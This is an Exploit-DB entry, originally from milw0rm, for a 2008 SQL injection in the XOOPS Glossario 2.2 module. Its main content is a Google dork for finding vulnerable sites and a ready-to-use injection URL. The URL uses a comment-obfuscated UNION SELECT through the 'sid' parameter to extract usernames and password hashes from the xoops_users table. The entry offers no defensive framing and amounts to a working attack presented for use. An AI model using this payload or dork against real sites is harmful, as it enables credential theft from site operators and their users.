XOOPS Module Glossario 2.2 sid Remote SQL Injection Vulnerability

2008-03-06T00:00:00
ID EDB-ID:5216
Type exploitdb
Reporter S@BUN
Modified 2008-03-06T00:00:00

Description

XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ###############################################################
#
###########XOOPS module glossaires SQL Injection
#
###############################################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
##DORK 1 : allinurl: "modules/glossaires"
#
################################################################
EXPLOIT :

modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme

################################################################
##S@BUN#############i AM NOT HACKER##########S@BUN#########
################################################################
##S@BUN######hackturkiye.hackturkiye@gmail.com####S@BUN#########
################################################################

side note:
Glossario 2.2 Per Xoops 2.X è stato adattato da Martialito da http://www.toplenet.com

# milw0rm.com [2008-03-06]